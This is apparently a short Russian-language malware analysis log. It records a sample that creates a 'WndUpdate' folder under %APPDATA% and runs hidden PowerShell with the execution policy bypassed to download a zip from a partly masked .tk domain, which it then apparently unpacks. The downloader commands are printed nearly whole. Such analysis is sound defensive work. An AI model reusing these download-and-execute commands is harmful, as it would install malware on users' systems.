Техническая информация
- http://re###eport.tk/rbc.zip как %appdata%\wndupdate\rbc.exe.zip
- '<SYSTEM32>\cmd.exe' /c mkdir "%APPDATA%\WndUpdate\"
- '<SYSTEM32>\cmd.exe' /c powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.Webclient).DownloadFile(' http://re###eport.tk/rbc.zip','%APPDATA%\WndUpdate\rbc.exe.zip'); (new-object -com shell.ap...
- DNS ASK re###eport.tk
- '<SYSTEM32>\cmd.exe' /c mkdir "%APPDATA%\WndUpdate\"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.Webclient).DownloadFile(' http://re###eport.tk/rbc.zip','%APPDATA%\WndUpdate\rbc.exe.zip'); (new-object -com shell.ap...' (со скрытым окном)